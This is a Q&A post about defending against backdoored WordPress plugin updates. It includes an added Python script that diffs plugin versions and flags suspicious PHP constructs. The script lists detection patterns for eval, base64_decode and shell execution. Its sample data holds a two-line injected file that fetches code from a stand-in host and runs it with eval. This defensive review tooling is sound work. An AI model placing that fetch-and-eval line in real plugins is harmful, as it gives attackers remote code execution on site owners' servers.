Protecting against malicious code in WordPress plugin updates

One of the most popular WordPress plugins listed on the WordPress plugins database got malicious code injected into it recently (April 2013):
http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html

A similar thing happened in 2011:
http://blog.sucuri.net/2011/06/wordpress-plugins-hacked-understanding-the-backdoor.html

How do I protect against updating my WordPress sites with the latest of the plugins and being done with it? Are there any security bulletins that I could subscribe to that list these latest compromises and when patches come out?

1 Answer

The security of plugin updates via .org really falls on the shoulders of WordPress to provide a secure repository and method for plugin authors to safeguard assets.

Since 2011 they have improved the system for notification on plugin changes, so plugin authors are notified when their code is altered. This is a good change, though it can be argued that additional steps should be implemented.

In order to compromise a .org plugin you would have to compromise the plugin author's computer and password, or perform a MITM attack.

On your end you don’t have that many options.

1. You can manually check the differences committed to the plugin update by browsing the code on Trac. Click on "Developers", browse to Trac and then click "View changes" after selecting two commits.


For example, on Trac, comparing two commits of the Jetpack plugin.

The downside is that you have to know how to read code.

2. You can try a malware scanning plugin, but this will not be very effective, since anyone with commit access would not be dumb enough to commit code that would be easily detected.

I run wpsecure.net and try to keep it up to date, but it pulls info from various security bulletins, namely secunia.com, osvdb.org and exploit-db.com.
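The first option in the answer (diffing two versions of a plugin before installing the update) can be scripted so that the review does not start from the whole diff but from the added lines most worth a second look. The script below is an added example, not part of the original question or answer and not code from WordPress.org or any plugin mentioned on this page. It treats each plugin version as a `{relative_path: file_contents}` mapping (which `load_plugin_zip` builds from a plugin zip such as the one served from downloads.wordpress.org), produces a unified diff per changed file, and flags added lines matching constructs that are rare in legitimate plugin code but common in injected PHP (`eval`, `base64_decode`, remote fetches, shell execution). The two sample versions and the injected `inc/counter.php` are constructed inline so it runs offline; the flagged patterns are review leads, not a malware verdict, which is exactly the limitation the answer gives for scanner plugins.

```python
"""Review a WordPress plugin update before applying it (added example).

Each plugin version is a dict {relative_path: file_contents}. The diff of the
two versions is computed with difflib, and every added line is checked against
patterns that usually deserve a human look. Sample data below is constructed.
"""
import difflib
import re
import zipfile
from typing import Dict, List, Tuple

# Constructs that are rare in honest plugin code but frequent in backdoors.
# A match is a lead for manual review, not proof of compromise.
SUSPICIOUS_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "create_function": re.compile(r"\bcreate_function\s*\("),
    "command execution": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
    "remote fetch": re.compile(r"\b(file_get_contents|curl_init|wp_remote_get|fopen)\s*\(\s*['\"]https?://"),
    "decompression/obfuscation": re.compile(r"\b(gzinflate|gzuncompress|str_rot13|strrev)\s*\("),
    "raw request input": re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\s*\["),
    "preg_replace /e": re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]"),
}


def load_plugin_zip(path: str) -> Dict[str, str]:
    """Build the {path: contents} mapping from a plugin zip, e.g. one downloaded
    from https://downloads.wordpress.org/plugin/<slug>.<version>.zip ."""
    with zipfile.ZipFile(path) as zf:
        return {n: zf.read(n).decode("utf-8", "replace")
                for n in zf.namelist() if not n.endswith("/")}


def unified_diff(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, List[str]]:
    """Unified diff per file that was added, removed or changed between versions."""
    diffs: Dict[str, List[str]] = {}
    for path in sorted(set(old) | set(new)):
        a = old.get(path, "").splitlines()
        b = new.get(path, "").splitlines()
        if a == b:
            continue  # unchanged file, nothing to review
        diffs[path] = list(difflib.unified_diff(
            a, b, fromfile=f"old/{path}", tofile=f"new/{path}", lineterm=""))
    return diffs


def flag_added_lines(diffs: Dict[str, List[str]]) -> List[Tuple[str, str, str]]:
    """Return (path, pattern_name, added_line) for every added line that matches."""
    findings = []
    for path, lines in diffs.items():
        for line in lines:
            # '+' marks an added line; '+++' is the file header, skip it.
            if not line.startswith("+") or line.startswith("+++"):
                continue
            code = line[1:]
            for name, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(code):
                    findings.append((path, name, code.strip()))
    return findings


def review_update(old: Dict[str, str], new: Dict[str, str]):
    """Diff two plugin versions and flag suspicious additions."""
    diffs = unified_diff(old, new)
    return diffs, flag_added_lines(diffs)


# Constructed sample: a version bump plus one injected file in the new release.
_MAIN_FILE = ("<?php\n/*\nPlugin Name: Example Widget\nVersion: {ver}\n*/\n"
              "function example_widget_render() {{\n"
              "    echo '<div class=\"example-widget\">Hello</div>';\n}}\n"
              "add_action('wp_footer', 'example_widget_render');\n")
OLD_PLUGIN = {
    "example-widget/example-widget.php": _MAIN_FILE.format(ver="1.0"),
    "example-widget/readme.txt": "=== Example Widget ===\nStable tag: 1.0\n",
}
NEW_PLUGIN = {
    "example-widget/example-widget.php": _MAIN_FILE.format(ver="1.1"),
    "example-widget/readme.txt": "=== Example Widget ===\nStable tag: 1.1\n",
    # Injected file: fetches code from a remote host and executes it.
    "example-widget/inc/counter.php": (
        "<?php\n"
        "$c = file_get_contents('http://example.invalid/counter.php');\n"
        "eval(base64_decode($c));\n"),
}

if __name__ == "__main__":
    diffs, findings = review_update(OLD_PLUGIN, NEW_PLUGIN)
    for path, lines in diffs.items():
        print("\n".join(lines))
    print("\nSuspicious additions:")
    for path, name, code in findings:
        print(f"  {path}: [{name}] {code}")
```

Run it against two real releases by replacing the sample dicts with `load_plugin_zip("slug.1.0.zip")` and `load_plugin_zip("slug.1.1.zip")`; the version-bump lines produce no findings, while the injected file is reported once per matching pattern, so the reviewer can jump straight to those hunks instead of reading every change.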
